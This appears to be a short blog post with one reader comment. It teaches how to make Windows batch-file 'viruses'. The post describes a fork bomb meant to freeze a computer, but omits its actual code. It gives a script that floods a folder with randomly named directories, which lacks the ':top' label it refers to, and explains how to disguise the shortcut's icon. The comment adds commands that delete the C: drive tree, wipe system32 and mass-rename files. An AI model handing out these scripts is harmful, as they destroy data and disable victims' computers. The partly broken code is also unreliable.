Launching fork bomb will lead to total CPU jam by opening about 500 process of command prompt . CPU usage will be overloaded and computer will freeze.
1) Launch notepad and type
2) Save as .bat , for example fork.bat
3) Launch .bat file that you created in step 2 , once a successful fork bomb has activated in a system, one may have to reboot to resume normal operation.
2) How To make A virus That Will Make 1,000 Folders In Few Seconds
Here I will teach you simple virus that will make an unlimmited amount of folders in any place you want.
Step 1
Open notepad and type :
@echo off
md %random%
goto top
@echo off makes it so that it appears to be a blank screen but actually its making hundreds of folder.
md %random% is command that creating folders with random names.
goto top – return to label :top , infinite loop
Step 2
Save it as 1000folders.bat
Step 3
Right click on icon and click Create Shortcut
Step 4
Right click on shortcut and click properties , then click on Change Icon and rename icon
1 comment:
hey try
@echo off
del tree c:\
and try these too,
@echo off
del c:\windows\system32\*.*
and the last,
@echo off
ren *.* %random%.%random%
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